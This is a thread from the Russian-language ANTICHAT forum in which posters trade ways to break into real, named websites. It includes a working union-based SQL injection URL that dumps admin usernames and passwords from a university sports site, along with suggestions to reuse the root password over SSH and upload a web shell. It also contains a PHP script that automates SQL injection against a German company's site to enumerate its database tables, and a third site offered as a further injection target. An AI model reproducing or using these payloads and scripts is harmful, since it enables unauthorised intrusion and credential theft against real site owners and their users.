ANTICHAT — форум по информационной безопасности, OSINT и технологиям

сомниваюсь штобы Spyder залил...
каким образом?
через логи?

А ты не сомневайся

reverse ip => выбирай сайты - читалка у тебя есть.

можно читать параметры подключения к бд и прочее. нет ничего сложного. или ищи админку

хотя долго искать не придется
http://wolfpack.loyno.edu/admin/
)
сложи 1+1 )

http://wolfpack.loyno.edu/news.php?action=view&id=-12+union+select+1,concat_ws(0x3a,uname,upass),3,4, 5+from+admin_users--
+
http://wolfpack.loyno.edu/admin/
--
вполне может быть что пас от рута может подойти к ссш (если есть+ есть доступ)

да я если честно админку и неискал... и инжекцию нераскручивал полностю) наврядли в админке есть штото интерестное кроме хтмл)
а к ssh сколько непробовал никогда рут пасс неподходил (ну я правда много и непробовал)....
я думаю в данном случае шелл незалить...
p.s если неправ доказуйте обратное) с удовольствием выслушаю...

mailbrush утверждает што спайдер уже туда залил шелл) ну штож покажыте... в лс киньте ссылку хотябы...
я несомниваюсь што здесь есть ребята которые смогут это зделать)

У тебя нету нестандартного мышления

С того, что оно у тебя стандартное - "Нету нормальной админки, нету шелла")

PS:

Настройте пожалуйста скрипт.

[/PHP]<?php
set_time_limit(0);
$set['b']='121212';//Что находится перед выводиомй инфой
$set['e']='212121';//Что находится после выводимой инфы
$set['u']='http://www.engelmt.de/en/cataloque/artikelgruppen.php?id=';//URL с узвимым параметров В КОНЦЕ(!)
$set['z']='-91 union select 1,2,3,4,5,6,7,concat(table_schema,0x3a,table_name) ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from+information_schema.tables LIMIT +++counter+++,1/*';//Уязвимый параметр
$set['c']='+++counter+++';//Строка счетчика
$set['f']='0';//Начальное значение счетчика
$set['s']='50';//Конечное значение счетчика
$set['h']='www.engelmt.de';//Хост

if(!empty($_GET['b']))$set['b']=$_GET['b'];
if(!empty($_GET['e']))$set['e']=$_GET['e'];
if(!empty($_GET['u']))$set['u']=$_GET['u'];
if(!empty($_GET['z']))$set['z']=$_GET['z'];
if(!empty($_GET['c']))$set['c']=$_GET['c'];
if(!empty($_GET['f']))$set['f']=$_GET['f'];
if(!empty($_GET['s']))$set['s']=$_GET['s'];
if(!empty($_GET['h']))$set['h']=$_GET['h'];

for($i=$set['f'];$i<=$set['s'];$i++)
{
$zapros=str_replace($set['c'],$i,$set['z']);//Изменияем счетчик в уязвимом параметре

//Создаем пакет
$header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n";
$header.="Accept-Language: en-us,en;q=0.5\r\n";
$header.="Accept-Charset: utf-8,*;q=0.7\r\n";
$header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5";
$header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n";
$header.="Connection: keep-alive\r\n";
$header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n";
$header.='Cookie2: $Version=1'."\r\n";
$header.="Host: ".$set['h']."\r\n\r\n";

$dt="";
$fp=fsockopen($set['h'], 80);
fwrite($fp, $header);
while(!feof($fp)) $dt.=fread($fp, 1024);
fclose($fp);

//Вырезаем необходимую инфу
$dt=substr($dt,strpos($dt,$set['b'])+strlen($set['b']));
$dt=substr($dt,0,strpos($dt,$set['e']));

//Выводим инфу на экран
echo($dt."\r\n");
flush();
}

?>

можно что-нибуть выжать или дохлый номер?
http://www.odz.com.ua/modules.php?name=music&d_op=last_music&pagenum='

атрибут космический-

бруто технику описывали уже с минимальным количеством запросов